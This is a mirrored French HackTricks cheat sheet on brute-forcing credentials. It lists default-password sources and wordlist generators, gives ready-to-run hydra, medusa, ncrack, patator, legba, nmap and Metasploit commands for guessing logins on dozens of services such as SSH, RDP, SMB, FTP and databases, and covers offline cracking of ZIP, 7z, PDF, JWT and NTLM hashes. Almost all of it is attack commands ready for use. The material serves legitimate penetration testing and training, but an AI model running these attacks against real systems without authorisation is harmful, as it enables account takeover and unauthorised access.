mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 00:20:59 +00:00
765 lines
35 KiB
Markdown
765 lines
35 KiB
Markdown
# Brute Force - CheatSheet
|
||
|
||
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire et **automatiser des workflows** grâce aux outils communautaires **les plus avancés**.\
|
||
Obtenez l'accès aujourd'hui :
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Vous travaillez dans une **entreprise de cybersécurité** ? Vous voulez voir votre **entreprise annoncée dans HackTricks** ? ou souhaitez-vous accéder à la **dernière version du PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Partagez vos astuces de hacking en soumettant des PR au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|
||
|
||
## Identifiants par Défaut
|
||
|
||
**Cherchez sur Google** les identifiants par défaut de la technologie utilisée, ou **essayez ces liens** :
|
||
|
||
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
|
||
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
|
||
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)
|
||
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)
|
||
* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)
|
||
* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)
|
||
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)
|
||
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
|
||
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
|
||
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
|
||
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
|
||
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
||
|
||
## **Créez vos propres Dictionnaires**
|
||
|
||
Trouvez autant d'informations que possible sur la cible et générez un dictionnaire personnalisé. Outils qui peuvent aider :
|
||
|
||
### Crunch
|
||
```bash
|
||
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
|
||
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
|
||
|
||
@ Lower case alpha characters
|
||
, Upper case alpha characters
|
||
% Numeric characters
|
||
^ Special characters including spac
|
||
crunch 6 8 -t ,@@^^%%
|
||
```
|
||
### Cewl
|
||
```bash
|
||
cewl example.com -m 5 -w words.txt
|
||
```
|
||
### [CUPP](https://github.com/Mebus/cupp)
|
||
|
||
Générez des mots de passe basés sur vos connaissances de la victime (noms, dates...)
|
||
```
|
||
python3 cupp.py -h
|
||
```
|
||
### [Wister](https://github.com/cycurity/wister)
|
||
|
||
Un outil générateur de listes de mots, qui vous permet de fournir un ensemble de mots, vous donnant la possibilité de créer plusieurs variations à partir des mots donnés, créant ainsi une liste de mots unique et idéale à utiliser concernant une cible spécifique.
|
||
```bash
|
||
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
|
||
|
||
__ _______ _____ _______ ______ _____
|
||
\ \ / /_ _|/ ____|__ __| ____| __ \
|
||
\ \ /\ / / | | | (___ | | | |__ | |__) |
|
||
\ \/ \/ / | | \___ \ | | | __| | _ /
|
||
\ /\ / _| |_ ____) | | | | |____| | \ \
|
||
\/ \/ |_____|_____/ |_| |______|_| \_\
|
||
|
||
Version 1.0.3 Cycurity
|
||
|
||
Generating wordlist...
|
||
[########################################] 100%
|
||
Generated 67885 lines.
|
||
|
||
Finished in 0.920s.
|
||
```
|
||
### [pydictor](https://github.com/LandGrey/pydictor)
|
||
|
||
### Listes de mots
|
||
|
||
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
|
||
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
|
||
* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)
|
||
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/google/fuzzing/tree/master/dictionaries)
|
||
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
|
||
* [**https://weakpass.com/wordlist/**](https://weakpass.com/wordlist/)
|
||
* [**https://wordlists.assetnote.io/**](https://wordlists.assetnote.io/)
|
||
* [**https://github.com/fssecur3/fuzzlists**](https://github.com/fssecur3/fuzzlists)
|
||
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
|
||
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
|
||
|
||
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Utilisez [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) pour construire et **automatiser des workflows** facilement, alimentés par les outils communautaires **les plus avancés**.\
|
||
Obtenez l'accès aujourd'hui :
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Services
|
||
|
||
Classés alphabétiquement par nom de service.
|
||
|
||
### AFP
|
||
```bash
|
||
nmap -p 548 --script afp-brute <IP>
|
||
msf> use auxiliary/scanner/afp/afp_login
|
||
msf> set BLANK_PASSWORDS true
|
||
msf> set USER_AS_PASS true
|
||
msf> set PASS_FILE <PATH_PASSWDS>
|
||
msf> set USER_FILE <PATH_USERS>
|
||
msf> run
|
||
```
|
||
### AJP
|
||
```bash
|
||
nmap --script ajp-brute -p 8009 <IP>
|
||
```
|
||
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM et Solace)
|
||
```bash
|
||
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
|
||
```
|
||
### Cassandra
|
||
```bash
|
||
nmap --script cassandra-brute -p 9160 <IP>
|
||
# legba ScyllaDB / Apache Casandra
|
||
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
|
||
```
|
||
### CouchDB
|
||
```bash
|
||
msf> use auxiliary/scanner/couchdb/couchdb_login
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
|
||
```
|
||
### Registre Docker
|
||
```
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
|
||
```
|
||
### Elasticsearch
|
||
```
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
|
||
```
|
||
### FTP
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> ftp
|
||
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
|
||
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
|
||
```
|
||
### Brute-force HTTP générique
|
||
|
||
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
|
||
|
||
### Authentification HTTP Basic
|
||
```bash
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
|
||
# Use https-get mode for https
|
||
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
|
||
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
|
||
```
|
||
### HTTP - NTLM
|
||
```bash
|
||
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
|
||
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
|
||
```
|
||
### HTTP - Formulaire Post
|
||
```bash
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
|
||
# Use https-post-form mode for https
|
||
```
|
||
Pour https, vous devez passer de "http-post-form" à "https-post-form"
|
||
|
||
### **HTTP - CMS --** (W)ordpress, (J)oomla ou (D)rupal ou (M)oodle
|
||
```bash
|
||
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
|
||
# Check also https://github.com/evilsocket/legba/wiki/HTTP
|
||
```
|
||
### IMAP
|
||
```bash
|
||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
|
||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
|
||
nmap -sV --script imap-brute -p <PORT> <IP>
|
||
legba imap --username user --password data/passwords.txt --target localhost:993
|
||
```
|
||
### IRC
|
||
```bash
|
||
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
|
||
```
|
||
### ISCSI
|
||
```bash
|
||
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
|
||
```
|
||
### JWT
|
||
```bash
|
||
#hashcat
|
||
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
|
||
|
||
#https://github.com/Sjord/jwtcrack
|
||
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
||
|
||
#John
|
||
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
|
||
|
||
#https://github.com/ticarpi/jwt_tool
|
||
python3 jwt_tool.py -d wordlists.txt <JWT token>
|
||
|
||
#https://github.com/brendan-rius/c-jwt-cracker
|
||
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
|
||
|
||
#https://github.com/mazen160/jwt-pwn
|
||
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
|
||
|
||
#https://github.com/lmammino/jwt-cracker
|
||
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
|
||
```
|
||
### LDAP
|
||
```bash
|
||
nmap --script ldap-brute -p 389 <IP>
|
||
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
|
||
```
|
||
### MQTT
|
||
```
|
||
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
|
||
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
|
||
```
|
||
### Mongo
|
||
```bash
|
||
nmap -sV --script mongodb-brute -n -p 27017 <IP>
|
||
use auxiliary/scanner/mongodb/mongodb_login
|
||
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
|
||
```
|
||
### MSSQL
|
||
```bash
|
||
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
||
```
|
||
### MySQL
|
||
```bash
|
||
# hydra
|
||
hydra -L usernames.txt -P pass.txt <IP> mysql
|
||
|
||
# msfconsole
|
||
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
|
||
|
||
# medusa
|
||
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
|
||
|
||
#Legba
|
||
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
|
||
```
|
||
### OracleSQL
|
||
```bash
|
||
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
|
||
|
||
./odat.py passwordguesser -s $SERVER -d $SID
|
||
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
|
||
|
||
#msf1
|
||
msf> use admin/oracle/oracle_login
|
||
msf> set RHOSTS <IP>
|
||
msf> set RPORT 1521
|
||
msf> set SID <SID>
|
||
|
||
#msf2, this option uses nmap and it fails sometimes for some reason
|
||
msf> use scanner/oracle/oracle_login
|
||
msf> set RHOSTS <IP>
|
||
msf> set RPORTS 1521
|
||
msf> set SID <SID>
|
||
|
||
#for some reason nmap fails sometimes when executing this script
|
||
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
|
||
|
||
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
|
||
```
|
||
Afin d'utiliser **oracle\_login** avec **patator**, vous devez **installer** :
|
||
```bash
|
||
pip3 install cx_Oracle --upgrade
|
||
```
|
||
[Bruteforce hors-ligne de hash OracleSQL](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** et **11.2.0.3**) :
|
||
```bash
|
||
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
|
||
```
|
||
### POP
|
||
```bash
|
||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
|
||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
|
||
|
||
# Insecure
|
||
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
|
||
|
||
# SSL
|
||
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
|
||
```
|
||
### PostgreSQL
|
||
```bash
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
|
||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
|
||
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
|
||
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
|
||
use auxiliary/scanner/postgres/postgres_login
|
||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
|
||
```
|
||
### PPTP
|
||
|
||
Vous pouvez télécharger le paquet `.deb` pour l'installation depuis [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
|
||
```bash
|
||
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
|
||
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
|
||
```
|
||
### RDP
|
||
```bash
|
||
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
|
||
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
|
||
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
|
||
```
|
||
### Redis
|
||
```bash
|
||
msf> use auxiliary/scanner/redis/redis_login
|
||
nmap --script redis-brute -p 6379 <IP>
|
||
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
|
||
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
|
||
```
|
||
### Rexec
|
||
```bash
|
||
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
|
||
```
|
||
### Rlogin
|
||
```bash
|
||
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
|
||
```
|
||
### Rsh
|
||
```bash
|
||
hydra -L <Username_list> rsh://<Victim_IP> -v -V
|
||
```
|
||
### Rsync
|
||
```bash
|
||
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
|
||
```
|
||
### RTSP
|
||
```bash
|
||
hydra -l root -P passwords.txt <IP> rtsp
|
||
```
|
||
### SFTP
|
||
```bash
|
||
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
|
||
# Try keys from a folder
|
||
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
|
||
```
|
||
### SNMP
|
||
```bash
|
||
msf> use auxiliary/scanner/snmp/snmp_login
|
||
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
|
||
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
|
||
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
|
||
```
|
||
### SMB
|
||
```bash
|
||
nmap --script smb-brute -p 445 <IP>
|
||
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
|
||
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]
|
||
```
|
||
### SMTP
|
||
```bash
|
||
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
|
||
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
|
||
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
|
||
```
|
||
### SOCKS
|
||
```bash
|
||
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
|
||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
|
||
# With alternative address
|
||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
|
||
```
|
||
### Serveur SQL
|
||
```bash
|
||
#Use the NetBIOS name of the machine as domain
|
||
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
|
||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
|
||
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
|
||
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
|
||
```
|
||
### SSH
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
||
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
|
||
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
|
||
# Try keys from a folder
|
||
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
|
||
```
|
||
#### Clés SSH faibles / PRNG prévisible de Debian
|
||
|
||
Certains systèmes présentent des défauts connus dans la graine aléatoire utilisée pour générer du matériel cryptographique. Cela peut entraîner une réduction considérable de l'espace des clés qui peut être forcée brutalement avec des outils tels que [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Des ensembles pré-générés de clés faibles sont également disponibles, tels que [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
||
|
||
### STOMP (ActiveMQ, RabbitMQ, HornetQ et OpenMQ)
|
||
|
||
Le protocole texte STOMP permet l'interaction avec des services de mise en file d'attente de messages comme ActiveMQ, RabbitMQ, HornetQ et OpenMQ.
|
||
```bash
|
||
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
|
||
```
|
||
### Telnet
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> telnet
|
||
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
|
||
|
||
legba telnet \
|
||
--username admin \
|
||
--password wordlists/passwords.txt \
|
||
--target localhost:23 \
|
||
--telnet-user-prompt "login: " \
|
||
--telnet-pass-prompt "Password: " \
|
||
--telnet-prompt ":~$ " \
|
||
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
|
||
```
|
||
### VNC
|
||
```bash
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
|
||
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
|
||
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
|
||
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
|
||
use auxiliary/scanner/vnc/vnc_login
|
||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||
legba vnc --target localhost:5901 --password data/passwords.txt
|
||
|
||
#Metasploit
|
||
use auxiliary/scanner/vnc/vnc_login
|
||
set RHOSTS <ip>
|
||
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
|
||
```
|
||
### Winrm
|
||
```bash
|
||
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||
```
|
||
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Utilisez [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) pour construire et **automatiser des workflows** facilement, alimentés par les outils communautaires **les plus avancés**.\
|
||
Obtenez l'accès aujourd'hui :
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Local
|
||
|
||
### Bases de données de cracking en ligne
|
||
|
||
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
|
||
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 avec/sans ESS/SSP et avec n'importe quelle valeur de challenge)
|
||
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, captures WPA2, et archives MSOffice, ZIP, PDF...)
|
||
* [https://crackstation.net/](https://crackstation.net) (Hashes)
|
||
* [https://md5decrypt.net/](https://md5decrypt.net) (MD5)
|
||
* [https://gpuhash.me/](https://gpuhash.me) (Hashes et hashes de fichiers)
|
||
* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes)
|
||
* [https://www.cmd5.org/](https://www.cmd5.org) (Hashes)
|
||
* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
|
||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
|
||
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
|
||
|
||
Consultez cela avant d'essayer de forcer brutalement un Hash.
|
||
|
||
### ZIP
|
||
```bash
|
||
#sudo apt-get install fcrackzip
|
||
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
|
||
```
|
||
|
||
```bash
|
||
zip2john file.zip > zip.john
|
||
john zip.john
|
||
```
|
||
|
||
```bash
|
||
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
|
||
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
|
||
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
|
||
```
|
||
#### Attaque de zip en connaissant le texte clair
|
||
|
||
Vous devez connaître le **texte clair** (ou une partie du texte clair) **d'un fichier contenu à l'intérieur** du zip chiffré. Vous pouvez vérifier **les noms de fichiers et la taille des fichiers contenus à l'intérieur** d'un zip chiffré en exécutant : **`7z l encrypted.zip`**\
|
||
Téléchargez [**bkcrack**](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) depuis la page des versions.
|
||
```bash
|
||
# You need to create a zip file containing only the file that is inside the encrypted zip
|
||
zip plaintext.zip plaintext.file
|
||
|
||
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
|
||
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
|
||
# With that key you can create a new zip file with the content of encrypted.zip
|
||
# but with a different pass that you set (so you can decrypt it)
|
||
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
|
||
unzip unlocked.zip #User new_pwd as password
|
||
```
|
||
### 7z
|
||
```bash
|
||
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
|
||
```
|
||
|
||
```bash
|
||
#Download and install requirements for 7z2john
|
||
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
|
||
apt-get install libcompress-raw-lzma-perl
|
||
./7z2john.pl file.7z > 7zhash.john
|
||
```
|
||
### PDF
|
||
```bash
|
||
apt-get install pdfcrack
|
||
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
|
||
#pdf2john didn't work well, john didn't know which hash type was
|
||
# To permanently decrypt the pdf
|
||
sudo apt-get install qpdf
|
||
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
|
||
```
|
||
### Mot de passe du propriétaire PDF
|
||
|
||
Pour cracker un mot de passe de propriétaire PDF, consultez ceci : [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
|
||
|
||
### JWT
|
||
```bash
|
||
git clone https://github.com/Sjord/jwtcrack.git
|
||
cd jwtcrack
|
||
|
||
#Bruteforce using crackjwt.py
|
||
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
||
|
||
#Bruteforce using john
|
||
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
|
||
john jwt.john #It does not work with Kali-John
|
||
```
|
||
### Craquage NTLM
|
||
```bash
|
||
Format:USUARIO:ID:HASH_LM:HASH_NT:::
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
|
||
